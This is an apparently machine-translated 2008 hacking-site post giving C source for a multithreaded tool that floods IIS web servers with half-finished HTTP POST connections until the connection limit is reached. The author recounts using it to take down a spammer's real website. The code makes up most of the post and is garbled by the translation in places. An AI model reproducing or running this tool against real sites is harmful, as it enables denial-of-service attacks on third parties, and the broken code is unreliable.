The use of IIS maximum number of connections to test site bandwidth-vulnerability warning-the black bar safety net

ID MYHACK58:62200819313
Type myhack58
Reporter 佚名
Modified 2008-06-10T00:00:00


This program only as technical exchanges, not for illegal purposes! Recently bought a space to play, you do not laugh, is the entry level of the virtual host, coupling is poor?, the various parameters are quite low, particularly IIS the number of connections, only 1 0 0, that is, at the same time support 1 0 0 different access. Here arises a problem. If I had been on the site for the connection, although I am the same person, but IIS it silly take each connection as a different people, each connected to a it will assign a session to me, when the connection is over the server setting IIS maximum connections to the number of time...... Oh, denial of service occurs. Specific attack well, we, Of course, is to use the program to complete. Idea is simple, is to continue to the website, send an HTTP request until it exceeds its maximum number of connections. Just on the machine has previously looked at the shotgun of the HTTP Protocol Content Lenth limit vulnerability to cause a denial of service attack on the Write of the test program, with today's requirements are very similar, it brought change slightly. Specific code is as follows:

( , XP SP1 debugging through. The compiled program can be in the Annex to this document download

| #include "winsock. h"

include "stdio. h"

include "string. h"

include "io. h"

pragma comment(lib,"ws2_32. lib")

define BUFLEN 1 0 2 4

define MAXThreadCount 1 0 //set the maximum number of threads

int ThreadCount=0;

struct mydata { char *ip; int port; };

unsigned int resolve(char name) { struct hostent he; unsigned int ip;

if((ip=inet_addr(name))==(-1)) { if((he=gethostbyname(name))==0) return 0; memcpy(&ip,he->h_addr,4); } return ip; }

DWORD WINAPI Dos(LPVOID lpParam ) { mydata csdn = (mydata)lpParam; struct sockaddr_in server; server. sin_family = AF_INET; server. sin_port = htons(csdn->port); server. sin_addr. server_address = resolve((char*)csdn->ip); if(server. sin_addr. server_address==0) {

printf("Don’t find address for %s\n",(char)csdn->ip); exit(0); } int my; char buf[1 0 0]="POST / HTTP/1.1\r\nHost: "; strcat(buf,(char)csdn->ip); strcat(buf," \r\nContent-Length: 1 0\r\n\r\n"); my=socket(THE,SOCK_STREAM,0); if(my==INVALID_SOCKET) { printf("ERROR"); exit(0); } if(connect(my,(struct sockaddr *) & server,sizeof(server))==SOCKET_ERROR) { printf("Socket ERROR:%d",GetLastError()); exit(0); } if(send(my,buf,strlen(buf),0)==SOCKET_ERROR){printf("ERROR:send fail!");} ThreadCount--; return 0; }

void thread ( char a1 , char a2 , char *a3 ) { static mydata tmp; tmp. ip = a1; tmp. port = atoi(a2);

DWORD dwThreadId; HANDLE hThread; WSADATA ws; if (WSAStartup( MAKEWORD(2,2), &ws )!= 0) { printf(" [-] WSAStartup() error\n"); exit(0); } hThread = CreateThread( NULL, // no security attributes 0, // use default stack size Dos, // thread function &tmp, // argument to thread function 0, // use default creation flags &dwThreadId); // returns the thread identifier if (hThread == NULL) printf( "CreateThread failed." ); ThreadCount++; Sleep(2 0 0); //delay, otherwise the CPU will use the full...... CloseHandle(hThread); }

int main(int argc, char* argv[]) { int i=0; if(argc!= 4) { printf("\n\tIIS MaxConnectionCount DOS by lake2 ,Jul,8,2 0 0 5\n"); printf("-Usage:\n"); printf("%s \n",argv[0]); printf("-Example: %s 8 0 3 0 0\n",argv[0]); return 0; } printf("Starting DOS............. Ctrl + C to break\n"); while( i < atoi(argv[3]) ) { if( ThreadCount < MAXThreadCount ){ thread(argv[1],argv[2],argv[3]); i++;} } while( 1 ){ } WSACleanup(); return 0; }

The program is a command line program, there are three parameters, in order to attack the website, domain name, port, number of connections. Well, to test the effect first. The test target is a PC, the system is win2000 on. IIS Management The maximum number of connections is set to 2 0 0, soon the website will not be visited; and increased to 5 0 0, will still be when; 8 0 0, or to is when. During the test the computer is running World Of Warcraft, and has been normal. It seems our program just deal with the website, not yangji innocent.^_^

If so, then simply try the IIS number of connections is unlimited. Program the connection parameters for me to fill 8 0 0 0, the results of running the way my system without a buffer range, winsock generates 1 0 0 5 5 No error, the program aborted. Oh, it seems this method is only for the use of virtual space in the small site. Good, even have to actually use it. Open the mailbox, just to find sealed advertising spam, visit the guy's website, and then start to attack it, to deal with this small-Station connection Count is set to 3 0 0 On more than enough. Oh, soon that website doesn't work out, Hey, this why shouldn't I may not I, who called him spam before. Well, the test is completed, passed the acceptance, will not play with him.

This is just a test program, and really want to put to the application also have to perfect the perfect. Again nonsense sentence, if I were with someone else no country enemies hate the words or don't DOS.